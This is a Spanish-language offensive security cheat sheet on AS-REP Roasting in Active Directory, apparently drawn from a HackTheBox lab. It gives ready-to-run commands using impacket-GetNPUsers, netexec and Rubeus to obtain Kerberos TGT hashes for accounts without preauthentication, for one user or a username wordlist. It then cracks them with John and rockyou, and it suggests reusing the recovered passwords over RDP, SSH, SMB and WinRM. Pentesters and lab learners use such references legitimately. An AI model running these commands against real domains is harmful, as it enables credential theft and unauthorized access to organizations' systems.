⚪ AS-REP Roasting
Información
Cuando un usuario del dominio tiene seteado el atributo UF_DONT_REQUIRE_PREAUTH, se puede obtener un Ticket Granting Ticket (TGT) en forma de hash que posteriormente se podrá crackear por fuerza bruta de forma offline.
Requisitos
- Disponer de un nombre de usuario valido a nivel de dominio (no necesario conocer su password).
- Disponer del dominio de Acive Directory y agregar al archivo
/etc/hosts. - El usuario tiene que disponer del atributo
UF_DONT_REQUIRE_PREAUTH. - Sincronizar nuestra hora local con la del DC (solo en caso de error).
TGT (Obtener)
El hash que se obtiene no sirve para realizar PassTheHash (PtH), solo se puede intentar crackear por fuerza bruta de forma offline y si se logra romper podemos reutilizar el password en otros servicios como RDP, SSH, SMB, FTP, WINRM.
Remoto
# user
impacket-GetNPUsers htb.local/svc-alfresco -no-pass
netexec ldap htb.local -u 'svc-alfresco' -p '' --asreproast output.txt
netexec ldap htb.local -u 'svc-alfresco' -p '' --asreproast output.txt --kdcHost 192.168.1.2
# users wordlist
impacket-GetNPUsers -no-pass -usersfile users.dic htb.local/
netexec ldap htb.local -u users.dic -p '' --asreproast output.txt
netexec ldap htb.local -u users.dic -p '' --asreproast output.txt --kdcHost 192.168.1.2
for user in $(cat users.dic); do impacket-GetNPUsers htb.local/"${user}" -no-pass 2>/dev/null; done |grep "\$krb5"
Local
# users detect
.\Rubeus.exe asreproast /nowrap
# user
.\Rubeus.exe asreproast /user:svc-alfresco /nowrap
TGT (Cracking)
john --wordlist=/opt/rockyou.txt hash
john --show hash
Wordlist (Usuarios)
- https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt
- https://github.com/attackdebris/kerberos_enum_userlists
Reloj
Para que algunos ataques funcionen, es necesario sincronizar nuestra hora local con la del DC.
Sincronizar
# apt-get install rdate -y
rdate -n 192.168.1.2
#or
# apt-get install ntpdate -y
ntpdate 192.168.1.2
Error
En caso de error al intentar sincronizar la hora, es necesario detener el servicio VirtualBox.
service virtualbox-guest-utils stop
ntpdate -s 192.168.1.2
© d4t4s3c 2025